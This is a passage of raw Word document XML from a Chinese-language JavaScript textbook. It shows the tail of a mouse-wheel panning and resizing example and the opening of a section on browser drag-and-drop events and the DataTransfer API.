      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所以，希望取消</w:t>
      </w:r>
      <w:r>
        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件将阻止</w:t>
      </w:r>
      <w:r>
        <w:t>mousewhe</w:t>
      </w:r>
      <w:r>
        <w:t>el</w:t>
      </w:r>
      <w:r>
        <w:t>事件的产生</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var deltaX=e.deltaX*-30||//wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.wheelDeltaX/4||//mousewheel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0;//</w:t>
      </w:r>
      <w:r>
        <w:t>属性未定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var deltaY=e.deltaY*-30||//wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.wheelDeltaY/4||//Webkit</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(e.wheelDeltaY===undefined</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有</w:t>
      </w:r>
      <w:r>
        <w:t>2D</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.wheelDelta/4)||//</w:t>
      </w:r>
      <w:r>
        <w:t>那么就用</w:t>
      </w:r>
      <w:r>
        <w:t>1D</w:t>
      </w:r>
      <w:r>
        <w:t>的滚轮属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.detail*-10||//Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>MouseScroll</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0;//</w:t>
      </w:r>
      <w:r>
        <w:t>属性未定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在大多数浏览器中，每次鼠标滚轮单击对应的</w:t>
      </w:r>
      <w:r>
        <w:t>delta</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>120</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但是，在</w:t>
      </w:r>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:t>中，鼠标滚轮似乎对速度更敏感，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>其</w:t>
      </w:r>
      <w:r>
        <w:t>delta</w:t>
      </w:r>
      <w:r>
        <w:t>值通常要大</w:t>
      </w:r>
      <w:r>
        <w:t>120</w:t>
      </w:r>
      <w:r>
        <w:t>倍，使用</w:t>
      </w:r>
      <w:r>
        <w:t>Apple</w:t>
      </w:r>
      <w:r>
        <w:t>鼠标至少如此</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用浏览器测试解决这个问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isMacWebkit){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>deltaX/=30;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>deltaY/=30;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>（未来版本）中得到</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>那么就不再需要</w:t>
      </w:r>
      <w:r>
        <w:t>DOMMouseScroll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isFirefox</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>e.type!=="DOMMouseScroll")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.removeEventListener("DOMMouseScroll",wheelHandler,false);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取内容元素的当前尺寸</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var contentbox=content.getBoundingClientRect();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var contentwidth=contentbox.right-contentbox.left;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var contentheight=contentbox.bottom-con</w:t>
      </w:r>
      <w:r>
        <w:t>tentbox.top;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.altKey){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果按下</w:t>
      </w:r>
      <w:r>
        <w:t>Alt</w:t>
      </w:r>
      <w:r>
        <w:t>键，就可以调整</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(deltaX){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>framewidth-=deltaX;//</w:t>
      </w:r>
      <w:r>
        <w:t>新宽度，但不能比内容大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>framewidth=Math.min(framwidth,contentwidth);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>framewidth=Math.max(framewidth,50);//</w:t>
      </w:r>
      <w:r>
        <w:t>且也不能比</w:t>
      </w:r>
      <w:r>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:t>小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.style.width=framewidth+"px";//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>上设置它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(deltaY){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frameheight-=deltaY;//</w:t>
      </w:r>
      <w:r>
        <w:t>同样的操作对</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>的高度做一遍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frameheight=Math.min(frameheight,contentheight);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frameheight=Math.max(frameheight-deltaY,50);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.style.height=frameheight+"px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>没有按下</w:t>
      </w:r>
      <w:r>
        <w:t>Alt</w:t>
      </w:r>
      <w:r>
        <w:t>辅助键，就可以平移</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>中的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(deltaX){//</w:t>
      </w:r>
      <w:r>
        <w:t>不能再滚动了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var minoffset=Math.min(frame</w:t>
      </w:r>
      <w:r>
        <w:t>width-contentwidth,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>deltaX</w:t>
      </w:r>
      <w:r>
        <w:t>添加到</w:t>
      </w:r>
      <w:r>
        <w:t>contentX</w:t>
      </w:r>
      <w:r>
        <w:t>中，但不能小于</w:t>
      </w:r>
      <w:r>
        <w:t>minoffset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contentX=Math.max(contentX+deltaX,minoffset);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contentX=Math.min(contentX,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>或比</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>content.style.left=contentX+"px";//</w:t>
      </w:r>
      <w:r>
        <w:t>设置新的偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(deltaY){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>minoffset=Math.min(frameheight-contentheight,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>deltaY</w:t>
      </w:r>
      <w:r>
        <w:t>添加到</w:t>
      </w:r>
      <w:r>
        <w:t>contentY</w:t>
      </w:r>
      <w:r>
        <w:t>，但不能小于</w:t>
      </w:r>
      <w:r>
        <w:t>minoffset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contentY=Math.max(contentY+deltaY,minoffset);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contentY=Math.min(contentY,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>或比</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>content.style.top=contentY+"px";//</w:t>
      </w:r>
      <w:r>
        <w:t>设置新的偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>不让这个事件冒泡，阻止任何默认操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这会阻止浏览器使用</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:t>滚动文档</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>希望对于相同的鼠标滚动，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件上的</w:t>
      </w:r>
      <w:r>
        <w:t>preventDefault()</w:t>
      </w:r>
      <w:r>
        <w:t>也能阻止</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件的产生</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.preventDefault)e.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.stopPropagation)e.stopPropagation();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.cancelBubble=true;//IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.returnValue=false;//IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>return false;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45" w:name="17_7_Tuo_Fang_Shi_Jian_"/>
      <w:r>
        <w:t>17.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　拖放事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="445"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>17-2</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何在应用中响应鼠标拖动。使</w:t>
      </w:r>
      <w:r>
        <w:t>用像那样的技术允许在网页中拖起和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>放置</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>元素，但真正的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>拖放</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是另一回事。拖放（</w:t>
      </w:r>
      <w:r>
        <w:t>Drag-and-Drop</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>DnD</w:t>
      </w:r>
      <w:r>
        <w:t>）是在</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>拖放源（</w:t>
      </w:r>
      <w:r>
        <w:t>drag source</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>拖放目标（</w:t>
      </w:r>
      <w:r>
        <w:t>drop target</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>之间传输数据的用户界面，它可以存在相同应用之间也可是不同应用之间。拖放是复杂的人机交互，用于实现拖放的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>总是很复杂：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>它们必须和底层</w:t>
      </w:r>
      <w:r>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:t>结合，使它们能够在不相关的应用间工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>它们必须适用于</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>移动</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>链接</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>数据传输操作，允许拖放源和拖放目标通过设置限制允许的操作，然后让用户选择（通常使用键盘辅助</w:t>
      </w:r>
      <w:r>
        <w:t>键）许可设置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>它们必须为拖放源提供一种方式指定待拖动的图标或图像。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>它们必须为拖放源和拖放目标的</w:t>
      </w:r>
      <w:r>
        <w:t>DnD</w:t>
      </w:r>
      <w:r>
        <w:t>交互过程提供基于事件的通知。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的早期版本引入了</w:t>
      </w:r>
      <w:r>
        <w:t>DnD API</w:t>
      </w:r>
      <w:r>
        <w:t>。它并不是精心设计且良好归档的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，但其他浏览器都尝试复制它，且</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准化了类似</w:t>
      </w:r>
      <w:r>
        <w:t>IE DnD API</w:t>
      </w:r>
      <w:r>
        <w:t>的东西并增加了使</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>更易于使用的新特性。在写本章时，这些新的易于使用的</w:t>
      </w:r>
      <w:r>
        <w:t>DnD API</w:t>
      </w:r>
      <w:r>
        <w:t>尚未实现，所以本节包括了</w:t>
      </w:r>
      <w:r>
        <w:t>IE API</w:t>
      </w:r>
      <w:r>
        <w:t>来表示对</w:t>
      </w:r>
      <w:r>
        <w:t>HTM5</w:t>
      </w:r>
      <w:r>
        <w:t>标准祝福。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IE DnD </w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>难以使用以及当前浏览器的不同实现使得无法共同使用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>一些较复杂的部分，但它允许</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用像普通的桌面应用一样参与应用间</w:t>
      </w:r>
      <w:r>
        <w:t>DnD</w:t>
      </w:r>
      <w:r>
        <w:t>。浏览器一直能够实现简单的</w:t>
      </w:r>
      <w:r>
        <w:t>DnD</w:t>
      </w:r>
      <w:r>
        <w:t>。如果在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中选择了文本，非常容易把文本拖到字处理器中。同时如果在字处理器中选择一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，你能把它拖到浏览器中并使浏览器访问这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。本节演示了如何创建自定义拖放源和自定义拖放目标，前者传输数据而不是其文本内容，后者以某种方式响应拖放数据而不是仅显示它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DnD</w:t>
      </w:r>
      <w:r>
        <w:t>总是基于事件且</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>包含两个事件集，一个在拖放源上触</w:t>
      </w:r>
      <w:r>
        <w:t>发，另一个在拖放目标上触发。所有传递给</w:t>
      </w:r>
      <w:r>
        <w:t>DnD</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的事件对象都类似鼠标事件对象，另外它拥有</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>属性。这个属性引用</w:t>
      </w:r>
      <w:r>
        <w:t>DataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象定义</w:t>
      </w:r>
      <w:r>
        <w:t>DnD API</w:t>
      </w:r>
      <w:r>
        <w:t>的方法和属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
